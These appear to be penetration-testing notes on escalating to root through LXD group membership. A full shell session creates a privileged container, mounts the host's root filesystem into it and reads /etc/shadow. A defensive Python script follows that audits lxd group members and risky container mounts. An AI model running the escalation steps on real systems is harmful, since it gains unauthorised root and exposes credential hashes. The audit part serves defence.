# LXD group - N/A

## Privilege escalation using lxd group

```bash
test@server-01:~$ id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

# Init lxd to create "root device"
test@server-01:/dev/shm$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: n
Do you want to configure a new storage pool? (yes/no) [default=yes]: y
Name of the new storage pool [default=default]: 
Name of the storage backend to use (zfs, ceph, btrfs, dir, lvm) [default=zfs]: 
Create a new ZFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=19GB]: 1
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: no
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

# Create a privileged container from the image
test@server-01:/dev/shm$ lxc init ubuntu:16.04 privesc -c security.privileged=true
Creating privesc
test@server-01:/dev/shm$ lxc image list
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |                 DESCRIPTION                 | ARCHITECTURE |   TYPE    |   SIZE   |         UPLOAD DATE          |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
|       | 712a58368655 | no     | ubuntu 16.04 LTS amd64 (release) (20211001) | x86_64       | CONTAINER | 171.55MB | Apr 28, 2022 at 7:19am (UTC) |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+

# Mount system root (/) to container
test@server-01:/dev/shm$ lxc config device add privesc whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to privesc

# Start container and reap the rewards
test@server-01:/dev/shm$ lxc start privesc
test@server-01:/dev/shm$ lxc exec privesc bash
root@privesc:~# cd /mnt/root/
root@privesc:/mnt/root# cat etc/shadow
root:*:18913:0:99999:7:::

# Clean up
test@server-01:/dev/shm$ lxc stop privesc --force
test@server-01:/dev/shm$ lxc delete privesc
test@server-01:/dev/shm$ lxc image delete 712a58368655
```
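A defensive audit for the two conditions the session above relies on, `lxd` group membership and a privileged container with a host-path disk device. This is an added example, not part of the original notes. The function names, the `SENSITIVE` path list and both sample inputs are constructed for illustration, and the JSON is assumed to have the shape of `lxc list --format json` output.

```python
import json

# Constructed samples: an /etc/group excerpt and a trimmed instance list
# (assumed shape of `lxc list --format json`).
SAMPLE_GROUP = "adm:x:4:syslog,test\nsudo:x:27:test\nlxd:x:110:test\n"
SAMPLE_INSTANCES = json.dumps([
    {"name": "privesc",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {"whatever": {"type": "disk", "source": "/",
                                       "path": "/mnt/root", "recursive": "true"}}},
    {"name": "web",
     "expanded_config": {},
     "expanded_devices": {"root": {"type": "disk", "pool": "default", "path": "/"}}},
])
SENSITIVE = ("/", "/etc", "/root", "/home", "/var")  # assumed policy list


def lxd_group_members(group_text, group="lxd"):
    """Return users listed as members of `group` in /etc/group-format text."""
    for line in group_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 4 and fields[0] == group:
            return [u for u in fields[3].split(",") if u]
    return []


def risky_instances(instances_json):
    """Map instance name -> findings (privileged mode, sensitive host-path disks)."""
    findings = {}
    for inst in json.loads(instances_json):
        cfg = inst.get("expanded_config") or inst.get("config") or {}
        devs = inst.get("expanded_devices") or inst.get("devices") or {}
        notes = []
        if cfg.get("security.privileged", "false").lower() in ("true", "1", "yes", "on"):
            notes.append("privileged")
        for dev_name, dev in devs.items():
            src = dev.get("source", "")
            # Pool-backed root disks carry no "source"; only host paths are flagged.
            if dev.get("type") == "disk" and src.startswith("/"):
                norm = src.rstrip("/") or "/"
                if norm in SENSITIVE:
                    notes.append(f"disk {dev_name}: host {norm} -> {dev.get('path')}")
        if notes:
            findings[inst["name"]] = notes
    return findings


if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP))
    for name, notes in risky_instances(SAMPLE_INSTANCES).items():
        print(name, "->", "; ".join(notes))
```

On a real host, feed it the contents of `/etc/group` and the output of `lxc list --format json`; accounts whose primary group is `lxd` do not appear in the `/etc/group` member field and need a separate check against `/etc/passwd`.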


